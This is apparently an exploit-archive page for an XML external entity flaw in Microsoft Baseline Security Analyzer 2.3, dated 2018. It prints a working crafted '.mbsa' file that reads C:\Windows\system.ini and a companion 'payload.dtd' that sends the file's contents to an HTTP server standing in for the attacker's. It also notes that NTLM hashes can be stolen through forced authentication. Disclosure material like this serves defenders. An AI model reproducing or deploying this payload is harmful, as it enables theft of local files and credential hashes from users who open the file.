Microsoft baseline security analyzer 2.3 xml external entity injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-09-10 |
Type : local |
Platform : windows
This exploit / vulnerability Microsoft baseline security analyzer 2.3 xml external entity injection is for educational purposes only and if it is used you will do on your own risk!
# Security Issue
# Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker
# controlled server if a user opens a specially crafted ".mbsa" file.
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
# 2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
# When victim attempts open file they get prompted "Do you want to let this app
# make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft.
# After opening the local users files can be exfiltrated to a remote server.
# Moreover, we can use this to steal NTLM hashes.
# Using Forced Authentication to steal NTLM hashes